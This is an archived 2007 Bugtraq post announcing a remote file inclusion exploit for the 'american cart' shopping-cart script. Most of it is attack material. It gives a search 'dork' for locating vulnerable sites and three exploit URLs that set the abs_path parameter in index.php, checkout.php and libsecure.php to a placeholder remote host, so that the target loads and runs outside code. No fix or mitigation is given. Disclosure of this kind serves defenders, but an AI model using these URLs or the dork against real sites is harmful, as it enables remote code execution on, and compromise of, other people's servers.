| lists.openwall.net | lists / announce john-users owl-users popa3d-users / xvendor oss-security / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 | |
|
Open Source and information security mailing list archives
| ||
|
Date: 6 May 2007 16:17:37 -0000 From: kepledehlah@...wini.co.uk To: bugtraq@...urityfocus.com Subject: american cart 3.* (abs_path) remote file include # american cart 3.5 (abs_path) remote file include # script Vendor: http://americancart.us # Discovered by: IbnuSina # Dork : "powered by american cart" ================= exploitz : http://target.lu/[americanpath]/index.php?abs_path=injekan.lu? http://target.lu/[americanpath]/checkout.php?abs_path=injekan.lu? http://target.lu/[americanpath]/libsecure.php?abs_path=injekan.lu?